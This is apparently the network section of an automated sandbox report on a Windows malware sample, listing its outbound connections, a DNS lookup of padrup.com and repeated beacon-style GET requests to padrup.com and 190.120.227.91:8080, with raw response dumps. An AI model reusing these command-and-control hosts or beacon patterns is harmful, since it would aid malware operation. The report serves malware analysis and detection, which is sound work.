                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.953200102 CEST649634611192.168.2.7121.135.15.57
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.097415924 CEST616255878192.168.2.7122.169.249.87
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.624254942 CEST616266511192.168.2.7183.83.119.156
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:45.139511108 CEST616276296192.168.2.7195.174.68.81
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:45.971062899 CEST616286380192.168.2.777.81.225.89
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:46.452243090 CEST616295960192.168.2.7195.174.143.33
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:46.986623049 CEST616305415192.168.2.7117.239.49.110
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:47.498939037 CEST616315310192.168.2.7115.119.58.98
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.028748035 CEST616324876192.168.2.793.114.177.116
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.098830938 CEST5357084162.159.36.2192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.939914942 CEST53561231.1.1.1192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.108103991 CEST563354294192.168.2.7124.30.139.5
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.623816013 CEST563365285192.168.2.795.64.101.42
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.141468048 CEST563374490192.168.2.7189.35.177.247
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:01.186223030 CEST563384440192.168.2.795.76.49.203
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:01.707211971 CEST563394900192.168.2.7121.162.97.129
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:02.233390093 CEST563405220192.168.2.7115.98.98.230
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:03.042238951 CEST563414980192.168.2.7122.99.102.253
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:03.311852932 CEST563427023192.168.2.777.81.224.130
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.345959902 CEST563435038192.168.2.789.41.154.115
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.883975029 CEST563445614192.168.2.789.45.96.223
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:15.392713070 CEST563456065192.168.2.7195.239.22.166
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.195768118 CEST563466260192.168.2.7188.215.26.241
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.718312025 CEST563475959192.168.2.793.114.228.238
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.265798092 CEST563485545192.168.2.746.248.223.58
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:18.032288074 CEST563496130192.168.2.777.81.228.77
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:18.556148052 CEST563505960192.168.2.777.81.228.140
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:29.611979961 CEST563514980192.168.2.781.199.91.188
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:30.125649929 CEST563526065192.168.2.7190.111.22.45
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:30.659199953 CEST563536244192.168.2.785.204.112.3
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:31.437823057 CEST563545218192.168.2.7183.83.90.202
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:31.955214024 CEST563554980192.168.2.7178.233.92.89
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.484791040 CEST563565078192.168.2.7196.201.129.61
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.347023010 CEST563576538192.168.2.7195.46.33.124
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.859045029 CEST563585549192.168.2.794.55.239.88
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:42.311460018 CEST563591473192.168.2.794.76.206.19
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:42.831907034 CEST563605683192.168.2.746.45.148.196
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:43.361831903 CEST563615750192.168.2.783.222.184.130
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:43.874111891 CEST563625010192.168.2.758.140.114.152
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:44.389770985 CEST563634630192.168.2.780.178.242.19
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:44.905585051 CEST563646800192.168.2.761.95.152.112
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.423873901 CEST563657066192.168.2.7220.94.117.230
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.951773882 CEST563664840192.168.2.758.85.93.82
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:57.445199966 CEST563674876192.168.2.7195.42.129.188
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:57.954974890 CEST563689674192.168.2.781.180.90.149
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:58.469192028 CEST563698112192.168.2.7113.190.137.239
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:58.983314037 CEST563704375192.168.2.789.45.97.101
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:59.527113914 CEST563714882192.168.2.7203.110.84.90
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:00.046253920 CEST563726989192.168.2.7121.243.130.85
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:00.563608885 CEST563736219192.168.2.7124.123.112.184
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:01.088551044 CEST563744611192.168.2.7121.135.15.57
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:12.577378988 CEST563755878192.168.2.7122.169.249.87
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.092669964 CEST563766511192.168.2.7183.83.119.156
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.617476940 CEST563776296192.168.2.7195.174.68.81
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:14.140265942 CEST563786380192.168.2.777.81.225.89
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:14.656397104 CEST563795960192.168.2.7195.174.143.33
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.171559095 CEST563805415192.168.2.7117.239.49.110
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.727739096 CEST563815310192.168.2.7115.119.58.98
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:16.249675035 CEST563824876192.168.2.793.114.177.116
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:40.389117002 CEST563834294192.168.2.7124.30.139.5
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:40.904402971 CEST563845285192.168.2.795.64.101.42
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:41.420604944 CEST563854490192.168.2.7189.35.177.247
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:41.935719013 CEST563864440192.168.2.795.76.49.203
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:42.451302052 CEST563874900192.168.2.7121.162.97.129
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:42.967051029 CEST563885220192.168.2.7115.98.98.230
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:43.482587099 CEST563894980192.168.2.7122.99.102.253
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:43.998183966 CEST563907023192.168.2.777.81.224.130
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:55.404717922 CEST563915038192.168.2.789.41.154.115
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:55.920231104 CEST563925614192.168.2.789.45.96.223
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:56.437864065 CEST563936065192.168.2.7195.239.22.166
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:56.951900959 CEST563946260192.168.2.7188.215.26.241
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:57.467403889 CEST563955959192.168.2.793.114.228.238
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:57.982688904 CEST563965545192.168.2.746.248.223.58
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:58.498384953 CEST563976130192.168.2.777.81.228.77
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:59.014229059 CEST563985960192.168.2.777.81.228.140

                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.860819101 CEST192.168.2.71.1.1.10x138fStandard query (0)padrup.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.949084044 CEST1.1.1.1192.168.2.70x138fNo error (0)padrup.com185.53.178.50A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                  • padrup.com
                                                                                                                                                                                                                                  • 190.120.227.91:8080

                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  0192.168.2.749731185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.977289915 CEST153OUTGET /sobaka1.gif?52dc95=21721684 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.049990892 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:38:16 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_tsOBguzEwcOLZKegK+Ua5lTOcfpc82AjaRD73K0Ua6jRrvV3+he9PgaZafioxwctAH0SEhAJKpa47YFBqSfLvw==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.050107956 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzA5Ni43MDU2OjM3NGZkZjRiMTNmYTJjMTZlY2E5Y2FlYjcyMWIxYWU4MmM2ZWJlYzk2MGVjZjI0ODY5NzlhZmQ3ZTViNTk5Yzg6NjcxMjEwNjhhYzQ0ZA==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.050121069 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  1192.168.2.749737190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.094305992 CEST166OUTGET /sobakavolos.gif?53c2ee=32936340 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  2192.168.2.749758185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.514183044 CEST153OUTGET /sobaka1.gif?a66df5=87257000 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591331959 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:38:22 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Yb5AHOpqssvh4KOi9zYAWLMKSpdcxTWMld9rPZzpbV90kw1PGdc1u2EJSv1/g7G43dGncLNbfNmGB8jzhXdP/w==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591438055 CEST203INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEwMi4yMzc4Ojk3NmU2OGU5NGJlZDI2MTAyZTkwZThmM2ExNWM1OGIxOGYyZGMyYjIyZGI5ODNlOWRl
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591449976 CEST1236INData Raw: 36 66 39 0d 0a 59 7a 68 6c 5a 44 6b 35 4d 6d 4d 78 59 6a 56 6a 5a 47 49 36 4e 6a 63 78 4d 6a 45 77 4e 6d 55 7a 59 54 42 6a 4f 41 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65
                                                                                                                                                                                                                                  Data Ascii: 6f9YzhlZDk5MmMxYjVjZGI6NjcxMjEwNmUzYTBjOA==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scr
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591828108 CEST561INData Raw: 74 68 65 20 72 65 71 75 65 73 74 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73
                                                                                                                                                                                                                                  Data Ascii: the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=6712106e&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '47814c0876aa29703c1c38468d63fdb1222eb49c');</scr


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  3192.168.2.749764190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.619852066 CEST166OUTGET /sobakavolos.gif?c5c499=38882763 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  4192.168.2.749783185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.999886990 CEST155OUTGET /sobaka1.gif?14117e3=189388539 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058017969 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:38:27 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_PZg3daHakumPAnjsInq1ooDme8Q8nSQHwPO4YgavrhRMnoZDftPE6wPbaLXCYVZWJti9ItiYlLRrpXRk/Zaetg==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058171988 CEST212INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEwNy43MDU6NzFmNmM3NGY0OGIwYjk2MDMxMTVhMTg3NWFmY2NmNzdmZDJjNjdhNTAxY2QyNTFiOTdlOGE0M2IwMjM
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058183908 CEST1236INData Raw: 7a 5a 44 6b 35 4f 54 6f 32 4e 7a 45 79 4d 54 41 33 4d 32 46 6a 4d 57 5a 6d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77
                                                                                                                                                                                                                                  Data Ascii: zZDk5OTo2NzEyMTA3M2FjMWZm';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</sc
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058574915 CEST548INData Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 31 30 37 33
